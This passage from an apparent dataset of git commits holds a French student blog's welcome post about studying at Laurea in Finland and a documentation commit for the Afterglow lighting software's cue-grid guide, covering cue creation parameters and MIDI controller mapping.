+\nC'est pour cette raison que nous avons aujourd'hui d\u00e9cid\u00e9 de faire un blog, dans un premier temps pour partager nos ressources sur la Finlande, sa culture etc., et plus tard pour raconter notre exp\u00e9rience, que ce soit au niveau des cours que nous suivrons ou de la vie sur place.\n\nLes \u00e9tudiants ayant \u00e9t\u00e9 re\u00e7us \u00e0 Laurea et tenant ce blog sont : J\u00e9r\u00f4me CAMPEAUX (Paris), Martin DONADIEU (Montpellier), link:https:\/\/github.com\/ArmandDu[Armand DUPUIS] (Strasbourg), Beno\u00eet DURAND (Paris) et Coline MARION (Paris).\n\nBienvenue sur notre blog, nous esp\u00e9rons que vous l'appr\u00e9cierez et qu'il vous sera utile !","old_contents":"= Tervetuloa !\n\n:hp-tags: Pr\u00e9sentation, Introduction, Finlande, Laurea\n:hp-image: https:\/\/TeksInHelsinki.github.com\/images\/helsinki-background.jpg\n:published_at: 2015-02-25\n\nNous sommes cinq \u00e9tudiants d'Epitech - \u00e9cole d'expertise informatique fran\u00e7aise - et nous passerons notre quatri\u00e8me ann\u00e9e (2015\/2016) en Finlande ! Plus pr\u00e9cis\u00e9ment, nous avons \u00e9t\u00e9 accept\u00e9 \u00e0 l'universit\u00e9 de Laurea, \u00e0 Espoo, pr\u00e8s d'Helsinki. +\nC'est pour cette raison que nous avons aujourd'hui d\u00e9cid\u00e9 de faire un blog, dans un premier temps pour partager nos ressources sur la Finlande, sa culture etc., et plus tard pour raconter notre exp\u00e9rience, que ce soit au niveau des cours que nous suivrons ou de la vie sur place.\n\nLes \u00e9tudiants ayant \u00e9t\u00e9 re\u00e7us \u00e0 Laurea et tenant ce blog sont : J\u00e9r\u00f4me CAMPEAUX (Paris), Martin DONADIEU (Montpellier), link:https:\/\/github.com\/ArmandDu[Armand DUPUIS] (Strasbourg), Beno\u00eet DURAND (Paris) et Coline MARION (Paris).\n\nBienvenue sur notre blog, nous esp\u00e9rons que vous l'appr\u00e9cierez et qu'il vous sera utile !","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"e8d862ec8dcb559b478c04f9eab005e579b2113c","subject":"Fix heading levels, add TOC.","message":"Fix heading levels, add TOC.\n","repos":"brunchboy\/afterglow,ryfow\/afterglow,ryfow\/afterglow,brunchboy\/afterglow,dandaka\/afterglow,brunchboy\/afterglow,dandaka\/afterglow","old_file":"doc\/cues.adoc","new_file":"doc\/cues.adoc","new_contents":"= Cues\nJames Elliott <james@deepsymmetry.org>\n:icons: font\n:toc:\n:toc-placement: preamble\n\n\/\/ Set up support for relative links on GitHub; add more conditions\n\/\/ if you need to support other environments and extensions.\nifdef::env-github[:outfilesuffix: .adoc]\n\nCues are designed to support creating user interfaces for controlling\neffects. They provide a convenient way to organize, identify, trigger,\nadjust, and monitor effects. Each\nhttp:\/\/deepsymmetry.org\/afterglow\/doc\/afterglow.show.html[show] in\nAfterglow maintains a cue grid, which can be viewed and interacted\nwith through the <<README#the-embedded-web-interface,embedded web\ninterface>> and MIDI controller mapping implementations which can be\nhttp:\/\/deepsymmetry.org\/afterglow\/doc\/afterglow.show.html#var-register-grid-controller[registered\nas grid controllers], like the <<mapping_sync#using-ableton-push,Ableton Push>>.\n\n== The Cue Grid\n\nThe cue grid is a two dimensional arrangement of cues, where the\nbottom left corner is assigned coordinates `(0, 0)`. X coordinates\nincrease from left to right, and Y coordinates increase from bottom to\ntop. 
The web interface and registered grid controllers display 64 cues\nat a time in an 8×8 grid, and can be scrolled around that grid.\nThe user can configue (“link”) the web interface to track\nthe scroll position of a registered grid controller. When that is\ndone, scrolling either interface will cause the other to scroll in the\nsame way, so the browser window can act as documentation to help the\nuser learn the cue names associated with each available cue pad on the\ncontroller.\n\nimage::assets\/ShowGrid.png[Web interface]\n\nIn addition to names, cues can be assigned colors in the grid, and the\nweb interface will honor those colors, as will the physical grid\ncontrollers, within the limits of their capabilities. To provide\nfeedback about cue activation, a lightened version of the cue color is\ndisplayed for cues which are currently active. And to help inform the\nuser about cue compatibility, any cues which are assigned the same\neffect keyword, meaning they will terminate each other when launched,\nwill be displayed in a darkened color if an effect with that keyword\nis currently running. Examples of both of these can be seen in the\nfirst column of cues above, in which the “All Dimmers” cue\nis active and displaying a lightened version of the yellow color\nassigned to it, and the two cues above it, “All Saw Down\nBeat” and “All Saw Up 2 Beat” use the same keyword\nand color, and so are displaying a darkened version of the yellow\ncolor. This is a useful technique for building easy-to-learn cue\ngrids. The same cues are shown on the Ableton Push below, so you can\nsee how the color relationships help with learning the cue names.\n\nimage::assets\/AbletonInterface.jpg[Ableton Push interface]\n\nTo trigger a cue, simply press the corresponding pad on a physical\ninterface, or click within the grid cell in the web interface. The\neffect associated with the cue will be created and added to the show,\nand the grid cell will be lightened to indicate that the cue's\neffect is running. If the cue ends itself after a period, the grid\ninterface will be updated to reflect that as well.\n\nTo end a cue's effect before it would naturally end (or because\nit is open-ended and does not end until asked to), simply press the\npad corresponding to the running cue (or, again, click the grid cell\nin the web interface). The effect will be asked to end. Some effects\nend instantly, which will be refleced by the cue grid cell returning\nto its normal color. Some effects have a delayed ending, so they can\nfade out, or finish some musically relevant sequence. If this is\nhappening, the grid cell will blink while the effect ends, and then\nstay at its normal color once the effect finishes ending. If you want\nthe effect to end immediately you can press the pad one more time\nwhile the effect is performing its gradual ending, and it will be\nkilled at that point, regardless of how much longer it was planning to\nrun.\n\n[[held-flag]]Cues can also be created which run only as long as the\ncorresponding controller pad is held down (this is done by passing a\ntrue value with the `:held` optional keyword argument when creating\nthe cue). This is often done for intense effects like strobes.\n\nCues can also offer pressure sensitivity on controllers which support\nthis (like the Ableton Push). For such cues, one or more variable used\nby the cue can be updated by the aftertouch pressure exerted by the\noperator as they hold down the pad. 
This can make for very expressive\neffects, as exemplified by the Sparkle cue set up early in the\nexamples namespace's\nhttp:\/\/deepsymmetry.org\/afterglow\/doc\/afterglow.examples.html#var-make-cues[make-cues]\nfunction, and its\nhttp:\/\/deepsymmetry.org\/afterglow\/doc\/afterglow.examples.html#var-make-strobe-cue[strobe]\ncues. Of course, this pressure sensitivity is not possible with the\nweb cue grid.\n\nThe interface for moving around the cue grid is the diamond of arrows\nat the bottom right of both the web interface and the Ableton Push. If\nthere are more cues available in a particular direction, that arrow is\nlit, otherwise it is dark. For the cues pictured above, the bottom\nleft corner of the cue grid is being displayed, and there are more\ncues above and to the right, so the up and right scroll arrows are\nlit. Pressing an arrow scrolls to the next set of eight rows or\ncolumns in that direction. (And if the web view is linked to a grid\ncontroller, pressing the arrow on either will scroll both. For\nphysical grid controllers which lack scroll buttons, linking them to\nthe web interface is the most practical way of scrolling them.)\n\nCues can also be triggered from simpler MIDI controllers (which\ndon't register as grid controllers) by explicitly mapping notes\nor control changes sent by the controller to cues within the grid\nusing\nhttp:\/\/deepsymmetry.org\/afterglow\/doc\/afterglow.show.html#var-add-midi-control-to-cue-mapping[afterglow.show\/add-midi-control-to-cue-mapping].\nRegardless of the mechanism by which a cue is triggered, the web\ninterface, a registered grid controller, or an explicitly mapped MIDI\nnote or control change, feedback will be sent to all interfaces so the\nstatus of the cue will be represented consistently on all of them. And\na cue triggered on one controller can be ended on any other controller\nby simply pressing the lit button or clicking the lit cell there.\n\nFor example, to be able to trigger the Sparkle cue, which the examples\nnamespace places at `(0, 7)` within the sample show cue grid, by\npressing the bottom leftmost button on my inexpensive Korg nanoKontrol\n2 MIDI controller, after using\nhttp:\/\/deepsymmetry.org\/afterglow\/doc\/afterglow.midi.html#var-identify-mapping[afterglow.midi\/identify-mapping]\nto determine that the button sends control-change messages for\ncontroller number `43`, I can simply evaluate:\n\n[source,clojure]\n----\n(show\/add-midi-control-to-cue-mapping \"nano\" 0 :control 43 0 7)\n----\n\nNow I can press the top-left pad on the Push, click the top left cell\nin the Web interface, or press that button on the nanoKontrol, and the\nSparkle cue lights up on all three interfaces, and the effect runs and\nsparkles the lights.\n\n[NOTE]\n====\n\nIn order to enable Afterglow to send feedback about cue status to the\nlights on the nanoKontrol I needed to use the Korg Kontrol Editor to\nset its LED Mode to _External_ (as shipped, they were in _Internal_\nmode, and lit themselves when held down). Most MIDI controllers are\nlikely to need similar configuration to work as feedback-capable cue\ncontrollers with Afterglow, but most I have seen do offer\nconfiguration tools to enable this kind of external control.\n\n====\n\n[[creating-cues]]\n== Creating Cues\n\nThe\nhttp:\/\/deepsymmetry.org\/afterglow\/doc\/afterglow.effects.cues.html[afterglow.effects.cues]\nnamespace provides functions for creating cues. 
Unsurprisingly, the\nhttp:\/\/deepsymmetry.org\/afterglow\/doc\/afterglow.effects.cues.html#var-cue[cue]\nfunction creates a cue. At its most basic, you pass in two parameters,\n`show-key` which is the keyword that will be used to add the\ncue's effect to the show when the cue is triggered, ending any\nother effect running under that same keyword, and `effect`, which is a\nfunction that will be called when the cue is triggered, and whose\nresponsibility is to create and return the effect that the cue should\nadd to the show. This is done so that a fresh instance of the effect\nis used each time the cue is triggered, in case the effect is complex\nand maintains its own state. The effect creation function will be\npassed a map containing any <<cues#cue-variables,cue-specific variable bindings>>.\n\nNOTE: For the very common case of wanting to create a cue to activate\na fixture-specific _function_ (capability), and perhaps adjust the\nfunction's activation level while it runs, you can instead call the\nspecial-purpose `function-cue` described\n<<cues#creating-function-cues,below>>.\n\nThere are a number of optional keyword parameters which can be used to\nmodify the cue that is created. Remember that you can also consult the\nhttp:\/\/deepsymmetry.org\/afterglow\/doc\/afterglow.effects.cues.html#var-cue[API\ndocumentation] for another explanation of these functions, and for\nlinks to examine the source code, which is the most authoritative\nexplanation of how they work, and can offer inspiration for variations\nthat you might want to create yourself.\n\n[cols=\"1a,1a,5a\", options=\"header\"]\n.Keyword parameters to `cue`\n|===\n|Parameter\n|Default\n|Purpose\n\n|`:short-name`\n|effect name\n\n|Sets the text to be displayed for the cue in the web cue grid, and in\nthe text display of the controller (if it has one) when the cue is\nrunning. If you don't supply a short name, the name of the\neffect created by the `effect` function is used, but that may be too\nlong or not informative enough.\n\n|`:color`\n|white\n\n|Sets the color of the cue within the grid for hinting about its\npurpose and relatedness to other cues, to help operators learn and\nunderstand the interface. If not specified, white is used.\n\n|`:end-keys`\n|none\n\n|A list of keywords that identify additional effects to be ended when\nlaunching this cue. See the dimmer cue section of\nhttp:\/\/deepsymmetry.org\/afterglow\/doc\/afterglow.examples.html#var-make-cues[make-cues]\nfor an example of how this can be helpful: it sets up a couple of rows\nof dimmer cues where the leftmost affects all the dimmers in the\nlighting rig, and cancels all the cues that work on individual light\ngroups, while the individual light group dimmer cues cancel the\nall-dimmers cues, but leave the dimmer cues for other light groups\nalone.\n\n|`:priority`\n|`0`\n\n|Sets the effect priority used when adding the cue's effect to the\nshow. This can be used to make sure the effect runs before or after\nother effects in the <<rendering_loop#the-rendering-loop,rendering\nloop>>. 
Effects are run in order, and later effects can modify or\noverride the results of earlier ones, like the way the Sparkle effect\nin\nhttp:\/\/deepsymmetry.org\/afterglow\/doc\/afterglow.examples.html#var-make-cues[make-cues]\nis assigned a priority of 100 so it sorts after any chase which may be\nrunning, and its sparkles can lighten the color which would otherwise\nbe present in their fixtures.\n\n|`:held`\n|`false`\n\n|As described <<cues#held-flag,above>>, causes the cue's effect to run\nonly as long as the corresponding controller button or pad is held\ndown, if the controller supports that capability. All current\ncontroller implementations, including the web interface, the\n<<mapping_sync#using-ableton-push,Ableton Push mapping>>, and mappings\nto generic MIDI controllers created using\nhttp:\/\/deepsymmetry.org\/afterglow\/doc\/afterglow.show.html#var-add-midi-control-to-cue-mapping[afterglow.show\/add-midi-control-to-cue-mapping],\ndo honor this setting. The web interface and controllers like the\nPush, which can vary the color of cue grid cells, will provide\nfeedback that a cue will last only as long as it is held by displaying\na whitened version of the cue color while it is held down.\n\nShow operators can override the `:held` flag by holding down the\n`Shift` key when triggering the cue on interfaces which have `Shift`\nkeys (like the web interface and Ableton Push). This will cause the\ncue to run until the corresponding pad or grid cell is pressed again,\nand will not whiten the cue color while it is held down.\n\n|`:variables`\n|none\n\n|Specifies a sequence of show variable bindings that\ncan be used by the cue's effect. Each variable specification is a map,\nwhose content is described in the following table. These\nspecifications are used to create any necessary new variables, and a\nmap describing any cue-local variables is passed to the `effect`\nfunction when the cue is triggered, so they can be used as needed when\ncreating the cue's effect.\n\n|===\n\n[cols=\"1a,1a,5a\", options=\"header\"]\n.[[cue-variables]]Cue variable specification maps\n|===\n|Key\n|Default\n|Purpose\n\n|`:key`\n|_n\/a_\n\n|Identifies the variable that is being bound to the cue. This can\n either be a keyword, and refer to an existing show variable (set\n using\n http:\/\/deepsymmetry.org\/afterglow\/doc\/afterglow.show.html#var-set-variable.21[afterglow.show\/set-variable!]),\n or a string, meaning that a new variable should be introduced for the\n cue. The actual name of this new variable will be assigned when the\n cue is activated. In order for the effect to be able to access the\n correct variable, a map is passed to the `effect` function that\n creates the cue's effect. Within this map, the keys are keywords\n created from the strings passed as `:key` values in the cue's\n variable specification maps, and the corresponding values are the\n keyword of the variable that was created for the cue to go with that\n key. An example of using such cue-local variables can be found in the\n source of the\n http:\/\/deepsymmetry.org\/afterglow\/doc\/afterglow.examples.html#var-make-strobe-cue[make-strobe-cue]\n example, for the variable `level`. 
That cue also makes use of the\n independent show variable `:strobe-lightness` which is set by a\n separate `adjust-strobe` cue running the effect\n http:\/\/deepsymmetry.org\/afterglow\/doc\/afterglow.effects.fun.html#var-adjust-strobe[afterglow.fun\/adjust-strobe],\n forming an interesting demonstration of interacting cues.\n\n|`:start`\n|`nil`\n\n|Specifies the value to assign when creating the cue-local variable.\n Applies only when the value at `:key` is a string rather than a\n keyword, so a variable is being created just for the cue.\n\n|`:name`\n|variable name\n\n|Provides a name to identify the variable in the web interface and in\n the text area of physical controllers which provide a labeled\n interface for adjusting running effects, like the Ableton Push. If no\n name is supplied, the name of the value passed with `:key` is used;\n provide `:name` in cases where that would be insufficiently\n descriptive.\n\n|`:short-name`\n|none\n\n|If present, gives a shorter version of `:name` to be used in\n interfaces with limited space.\n\n|`:min`\n|`0`\n\n|Specifies the smallest value that the variable can be adjusted to, for\n interfaces which support adjustment of cue variables while the cue is\n running. If not supplied, the minimum value will be zero.\n\n|`:max`\n|`100`\n\n|Specifies the largest value that the variable can be adjusted to, for\n interfaces which support adjustment of cue variables while the cue is\n running. If not supplied, the maximum value will be one hundred.\n\n|`:type`\n|`:float`\n\n|Provides a hint for how the variable should be formatted in\n adjustment interfaces. Supported values are `:integer` and `:float`.\n Others may be added in the future. If not provided (or an\n unrecognized value is provided), the variable is assumed to hold\n floating-point values.\n\n|`:centered`\n|`false`\n\n|Requests that variable adjustment interfaces which draw a graphical\n representation of the current value within its range display this\n variable as a deviation from a central value, rather than something\n growing from the left, if they have such options.\n\n|`:resolution`\n|_varies_\n\n|Specifies the smallest amount by which the variable should be\n adjusted when the user is turning a continuous encoder knob. If not\n specified, the controller implementation gets to decide what to do.\n The recommended default resolution is no larger then 1\/256 of the\n range from `:min` to `:max`.\n\n|`:aftertouch`\n|`false`\n\n|If present, with a true value, requests that the variable value be\n adjusted by aftertouch pressure while the operator is holding down\n the button or pad which launched the cue, on controllers which have\n pressure sensitivity.\n\n|`:aftertouch-min`\n|`:min`\n\n|If present (and `:aftertouch` is active), specifies the smallest\n value the variable should be set to by MIDI aftertouch pressure. If\n not specified, the standard `:min` value is used.\n\n|`:aftertouch-max`\n|`:max`\n\n|If present (and `:aftertouch` is active), specifies the largest\n value the variable should be set to by MIDI aftertouch pressure. If\n not specified, the standard `:max` value is used.\n\n|===\n\n[[creating-function-cues]]\n== Creating Function Cues\n\nOften you want a cue to activate a specific feature of a fixture\n(often described as a _function_ in the fixture manual, and in the\nfixture definition within Afterglow, which can unfortunately get\nconfusing when we are talking about invoking Clojure functions). 
To\nmake it easy to work with such fixture capabilities, the\n`afterglow.effects.cues` namespace also offers the\nhttp:\/\/deepsymmetry.org\/afterglow\/doc\/afterglow.effects.cues.html#var-function-cue[function-cue]\nfunction. It is quite similar to the `cue` function described\n<<cues#creating-cues,above>>, but it takes care of creating the effect\nfor you, given the function name you want to apply to a fixture or set\nof fixtures. You can even apply the function to fixtures from\ndifferent manufactures, regardless of whether they implement it on\ndifferent channels and with different value ranges. If it has been\nassigned the same function name (such as, for example, `:strobe`),\nAfterglow will find it in each fixture definition, and send the right\nvalues to each fixture.\n\nNOTE: Function cues are able to figure out how to do the right thing\nfor each fixture because they can scan the fixture definitions for\n<<fixture_definitions#function-specifications,Function Specifications>>\nmatching the keyword you gave when creating the cue. When you patch a\nfixture into a show, Afterglow indexes its function ranges in order to\nmake this efficient.\n\n`function-cue` also automatically creates a temporary cue-local\nvariable for <<mapping_sync#effect-control,adjusting>> the function\nlevel if the function is not fixed over its range. This makes it\nessentially a one-liner to create a button in your cue grid which\nactivates a function and then, if your controller supports it, lets\nyou tweak that function while is running. Examples include the Torrent\ngobo, focus, and prism cues created by\nhttp:\/\/deepsymmetry.org\/afterglow\/doc\/afterglow.examples.html#var-make-cues[make-cues].\n\nMinimally, `function-cue` requires three parameters: `show-key` which\nis the keyword that will be used to add the cue's effect to the show\nwhen the cue is triggered, ending any other effect running under that\nsame keyword, `function`, which is the keyword identifying the\nfixture-specific capability that you want the cue to activate and\ncontrol, as defined in the fixture definition, and `fixtures`, which\nis the list of fixtures or heads that you want the cue to affect.\n(Only fixtures and heads which actually support the specified function\nwill be affected by the cue.)\n\nThere are a number of optional keyword parameters which can be used to\nmodify the cue that is created, and are described below. See the\nhttp:\/\/deepsymmetry.org\/afterglow\/doc\/afterglow.effects.cues.html#var-function-cue[API\ndocumentation] for more details.\n\n[cols=\"1a,1a,5a\", options=\"header\"]\n.Keyword parameters to `function-cue`\n|===\n|Parameter\n|Default\n|Purpose\n\n|`:effect-name`\n|function name\n\n|Sets the name to assign the effect created by the cue. If none is\n provided, the name of the `function` keyword is used.\n\n|`:short-name`\n|none\n\n|Can be used to provide a shorter name to be displayed for the cue in\nthe web cue grid, and in the text display of the controller (if it has\none) when the cue is running.\n\n|`:color`\n|white\n\n|Sets the color of the cue within the grid for hinting about its\npurpose and relatedness to other cues, to help operators learn and\nunderstand the interface. 
If not specified, white is used.\n\n|`:level`\n|`0`\n\n|If provided, and the function supports a range of values with\n different meanings (such as a focus range, movement speed, or the\n like), sets the initial level to assign the function, and to the\n variable which will be introduced to allow the function value to be\n adjusted while the cue runs. Functions with no variable effect will\n ignore `:level`, and will have no cue-specific variables created for\n them. The level is treated as a percentage, where 0 is mapped to the\n lowest legal DMX value that activates the function, and 100 is mapped\n to the highest.\n\n|`:htp`\n|`false`\n\n|If supplied along with a true value, causes the effect that is\n created for this cue to operate with _highest-takes-precedence_ rules\n with respect to any other effect which has already assigned a value\n for this function. Otherwise, the effect will simply discard any\n previous assignments, replacing them with its own regardless of their\n value.\n\n|`:end-keys`\n|none\n\n|A list of keywords that identify additional effects to be ended when\nlaunching this cue. See the dimmer cue section of\nhttp:\/\/deepsymmetry.org\/afterglow\/doc\/afterglow.examples.html#var-make-cues[make-cues]\nfor an example of how this can be helpful: it sets up a couple of rows\nof dimmer cues where the leftmost affects all the dimmers in the\nlighting rig, and cancels all the cues that work on individual light\ngroups, while the individual light group dimmer cues cancel the\nall-dimmers cues, but leave the dimmer cues for other light groups\nalone.\n\n|`:priority`\n|`0`\n\n|Sets the effect priority used when adding the cue's effect to the\nshow. This can be used to make sure the effect runs before or after\nother effects in the <<rendering_loop#the-rendering-loop,rendering\nloop>>. Effects are run in order, and later effects can modify or\noverride the results of earlier ones, like the way the Sparkle effect\nin\nhttp:\/\/deepsymmetry.org\/afterglow\/doc\/afterglow.examples.html#var-make-cues[make-cues]\nis assigned a priority of 100 so it sorts after any chase which may be\nrunning, and its sparkles can lighten the color which would otherwise\nbe present in their fixtures.\n\n|`:held`\n|`false`\n\n|As described <<cues#held-flag,above>>, causes the cue's effect to run\nonly as long as the corresponding controller button or pad is held\ndown, if the controller supports that capability. All current\ncontroller implementations, including the web interface, the\n<<mapping_sync#using-ableton-push,Ableton Push mapping>>, and mappings\nto generic MIDI controllers created using\nhttp:\/\/deepsymmetry.org\/afterglow\/doc\/afterglow.show.html#var-add-midi-control-to-cue-mapping[afterglow.show\/add-midi-control-to-cue-mapping],\ndo honor this setting. The web interface and controllers like the\nPush, which can vary the color of cue grid cells, will provide\nfeedback that a cue will last only as long as it is held by displaying\na whitened version of the cue color while it is held down.\n\nShow operators can override the `:held` flag by holding down the\n`Shift` key when triggering the cue on interfaces which have `Shift`\nkeys (like the web interface and Ableton Push). 
This will cause the\ncue to run until the corresponding pad or grid cell is pressed again,\nand will not whiten the cue color while it is held down.\n\n|`:aftertouch`\n|`false`\n\n|If present, with a true value, requests that the function value be\n adjusted by aftertouch pressure while the operator is holding down\n the button or pad which launched the cue, on controllers which have\n pressure sensitivity.\n\n|`:aftertouch-min`\n|`0`\n\n|If present (and `:aftertouch` is active), specifies the smallest\n value the function should be set to by MIDI aftertouch pressure. If\n not specified, `0` is used, which corresponds to the lowest legal\n DMX value the fixture definition identifies for the function.\n\n|`:aftertouch-max`\n|`100`\n\n|If present (and `:aftertouch` is active), specifies the largest value\n the variable should be set to by MIDI aftertouch pressure. If not\n specified, `100` is used, which corresponds to the highest legal DMX\n value the fixture definition identifies for the function.\n\n|===\n\n[[controlling-cues]]\n== Controlling Cues\n\nThe\nhttp:\/\/deepsymmetry.org\/afterglow\/doc\/afterglow.controllers.html[afterglow.controllers]\nnamespace defines some helpful functions for working with cues, and\ndefines a\nhttp:\/\/deepsymmetry.org\/afterglow\/doc\/afterglow.controllers.html#var-IGridController[grid\ncontroller protocol] which rich controller mappings, like the one for\nthe <<mapping_sync#using-ableton-push,Ableton Push>>, use to attach\nthemselves to a running show, and synchronize with the web interface.\n\nIf you are implementing a new grid controller mapping, you will want\nto study that protocol, and will likely find the Ableton Push mapping\na useful example and starting point for your own work. (And please,\nwhen you are done, submit a pull request to add your implementation to\nAfterglow!)\n\nWhen you are setting up the cue grid for your show, you will use\nhttp:\/\/deepsymmetry.org\/afterglow\/doc\/afterglow.controllers.html#var-set-cue.21[set-cue!]\nto arrange the cues you want it to contain. The\nhttp:\/\/deepsymmetry.org\/afterglow\/doc\/afterglow.examples.html#var-make-cues[make-cues]\nfunction in the examples namespace contains a lot of examples of doing\nthis. As cues are added to the grid, its dimensions are updated, and\nthe web interfaces and any registered grid controllers will\nimmediately reflect the new cue and dimensions.\n\nYou can remove a cue from the grid with\nhttp:\/\/deepsymmetry.org\/afterglow\/doc\/afterglow.controllers.html#var-clear-cue.21[clear-cue].\n\nThe rest of the functions in the `afterglow.controllers` namespace are used by\ncontroller implementations and running shows to mediate their\ninteractions with the cue grid; dig into them if you are writing code\nin those spaces.\n","old_contents":"= Cues\nJames Elliott <james@deepsymmetry.org>\n:icons: font\n\n\/\/ Set up support for relative links on GitHub; add more conditions\n\/\/ if you need to support other environments and extensions.\nifdef::env-github[:outfilesuffix: .adoc]\n\nCues are designed to support creating user interfaces for controlling\neffects. They provide a convenient way to organize, identify, trigger,\nadjust, and monitor effects. 
Each\nhttp:\/\/deepsymmetry.org\/afterglow\/doc\/afterglow.show.html[show] in\nAfterglow maintains a cue grid, which can be viewed and interacted\nwith through the <<README#the-embedded-web-interface,embedded web\ninterface>> and MIDI controller mapping implementations which can be\nhttp:\/\/deepsymmetry.org\/afterglow\/doc\/afterglow.show.html#var-register-grid-controller[registered\nas grid controllers], like the <<mapping_sync#using-ableton-push,Ableton Push>>.\n\nThe cue grid is a two dimensional arrangement of cues, where the\nbottom left corner is assigned coordinates `(0, 0)`. X coordinates\nincrease from left to right, and Y coordinates increase from bottom to\ntop. The web interface and registered grid controllers display 64 cues\nat a time in an 8×8 grid, and can be scrolled around that grid.\nThe user can configue (“link”) the web interface to track\nthe scroll position of a registered grid controller. When that is\ndone, scrolling either interface will cause the other to scroll in the\nsame way, so the browser window can act as documentation to help the\nuser learn the cue names associated with each available cue pad on the\ncontroller.\n\nimage::assets\/ShowGrid.png[Web interface]\n\nIn addition to names, cues can be assigned colors in the grid, and the\nweb interface will honor those colors, as will the physical grid\ncontrollers, within the limits of their capabilities. To provide\nfeedback about cue activation, a lightened version of the cue color is\ndisplayed for cues which are currently active. And to help inform the\nuser about cue compatibility, any cues which are assigned the same\neffect keyword, meaning they will terminate each other when launched,\nwill be displayed in a darkened color if an effect with that keyword\nis currently running. Examples of both of these can be seen in the\nfirst column of cues above, in which the “All Dimmers” cue\nis active and displaying a lightened version of the yellow color\nassigned to it, and the two cues above it, “All Saw Down\nBeat” and “All Saw Up 2 Beat” use the same keyword\nand color, and so are displaying a darkened version of the yellow\ncolor. This is a useful technique for building easy-to-learn cue\ngrids. The same cues are shown on the Ableton Push below, so you can\nsee how the color relationships help with learning the cue names.\n\nimage::assets\/AbletonInterface.jpg[Ableton Push interface]\n\nTo trigger a cue, simply press the corresponding pad on a physical\ninterface, or click within the grid cell in the web interface. The\neffect associated with the cue will be created and added to the show,\nand the grid cell will be lightened to indicate that the cue's\neffect is running. If the cue ends itself after a period, the grid\ninterface will be updated to reflect that as well.\n\nTo end a cue's effect before it would naturally end (or because\nit is open-ended and does not end until asked to), simply press the\npad corresponding to the running cue (or, again, click the grid cell\nin the web interface). The effect will be asked to end. Some effects\nend instantly, which will be refleced by the cue grid cell returning\nto its normal color. Some effects have a delayed ending, so they can\nfade out, or finish some musically relevant sequence. If this is\nhappening, the grid cell will blink while the effect ends, and then\nstay at its normal color once the effect finishes ending. 
If you want\nthe effect to end immediately you can press the pad one more time\nwhile the effect is performing its gradual ending, and it will be\nkilled at that point, regardless of how much longer it was planning to\nrun.\n\n[[held-flag]]Cues can also be created which run only as long as the\ncorresponding controller pad is held down (this is done by passing a\ntrue value with the `:held` optional keyword argument when creating\nthe cue). This is often done for intense effects like strobes.\n\nCues can also offer pressure sensitivity on controllers which support\nthis (like the Ableton Push). For such cues, one or more variable used\nby the cue can be updated by the aftertouch pressure exerted by the\noperator as they hold down the pad. This can make for very expressive\neffects, as exemplified by the Sparkle cue set up early in the\nexamples namespace's\nhttp:\/\/deepsymmetry.org\/afterglow\/doc\/afterglow.examples.html#var-make-cues[make-cues]\nfunction, and its\nhttp:\/\/deepsymmetry.org\/afterglow\/doc\/afterglow.examples.html#var-make-strobe-cue[strobe]\ncues. Of course, this pressure sensitivity is not possible with the\nweb cue grid.\n\nThe interface for moving around the cue grid is the diamond of arrows\nat the bottom right of both the web interface and the Ableton Push. If\nthere are more cues available in a particular direction, that arrow is\nlit, otherwise it is dark. For the cues pictured above, the bottom\nleft corner of the cue grid is being displayed, and there are more\ncues above and to the right, so the up and right scroll arrows are\nlit. Pressing an arrow scrolls to the next set of eight rows or\ncolumns in that direction. (And if the web view is linked to a grid\ncontroller, pressing the arrow on either will scroll both. For\nphysical grid controllers which lack scroll buttons, linking them to\nthe web interface is the most practical way of scrolling them.)\n\nCues can also be triggered from simpler MIDI controllers (which\ndon't register as grid controllers) by explicitly mapping notes\nor control changes sent by the controller to cues within the grid\nusing\nhttp:\/\/deepsymmetry.org\/afterglow\/doc\/afterglow.show.html#var-add-midi-control-to-cue-mapping[afterglow.show\/add-midi-control-to-cue-mapping].\nRegardless of the mechanism by which a cue is triggered, the web\ninterface, a registered grid controller, or an explicitly mapped MIDI\nnote or control change, feedback will be sent to all interfaces so the\nstatus of the cue will be represented consistently on all of them. 
And\na cue triggered on one controller can be ended on any other controller\nby simply pressing the lit button or clicking the lit cell there.\n\nFor example, to be able to trigger the Sparkle cue, which the examples\nnamespace places at `(0, 7)` within the sample show cue grid, by\npressing the bottom leftmost button on my inexpensive Korg nanoKontrol\n2 MIDI controller, after using\nhttp:\/\/deepsymmetry.org\/afterglow\/doc\/afterglow.midi.html#var-identify-mapping[afterglow.midi\/identify-mapping]\nto determine that the button sends control-change messages for\ncontroller number `43`, I can simply evaluate:\n\n[source,clojure]\n----\n(show\/add-midi-control-to-cue-mapping \"nano\" 0 :control 43 0 7)\n----\n\nNow I can press the top-left pad on the Push, click the top left cell\nin the Web interface, or press that button on the nanoKontrol, and the\nSparkle cue lights up on all three interfaces, and the effect runs and\nsparkles the lights.\n\n[NOTE]\n====\n\nIn order to enable Afterglow to send feedback about cue status to the\nlights on the nanoKontrol I needed to use the Korg Kontrol Editor to\nset its LED Mode to _External_ (as shipped, they were in _Internal_\nmode, and lit themselves when held down). Most MIDI controllers are\nlikely to need similar configuration to work as feedback-capable cue\ncontrollers with Afterglow, but most I have seen do offer\nconfiguration tools to enable this kind of external control.\n\n====\n\n[[creating-cues]]\nCreating Cues\n~~~~~~~~~~~~~\n\nThe\nhttp:\/\/deepsymmetry.org\/afterglow\/doc\/afterglow.effects.cues.html[afterglow.effects.cues]\nnamespace provides functions for creating cues. Unsurprisingly, the\nhttp:\/\/deepsymmetry.org\/afterglow\/doc\/afterglow.effects.cues.html#var-cue[cue]\nfunction creates a cue. At its most basic, you pass in two parameters,\n`show-key` which is the keyword that will be used to add the\ncue's effect to the show when the cue is triggered, ending any\nother effect running under that same keyword, and `effect`, which is a\nfunction that will be called when the cue is triggered, and whose\nresponsibility is to create and return the effect that the cue should\nadd to the show. This is done so that a fresh instance of the effect\nis used each time the cue is triggered, in case the effect is complex\nand maintains its own state. The effect creation function will be\npassed a map containing any <<cues#cue-variables,cue-specific variable bindings>>.\n\nNOTE: For the very common case of wanting to create a cue to activate\na fixture-specific _function_ (capability), and perhaps adjust the\nfunction's activation level while it runs, you can instead call the\nspecial-purpose `function-cue` described\n<<cues#creating-function-cues,below>>.\n\nThere are a number of optional keyword parameters which can be used to\nmodify the cue that is created. Remember that you can also consult the\nhttp:\/\/deepsymmetry.org\/afterglow\/doc\/afterglow.effects.cues.html#var-cue[API\ndocumentation] for another explanation of these functions, and for\nlinks to examine the source code, which is the most authoritative\nexplanation of how they work, and 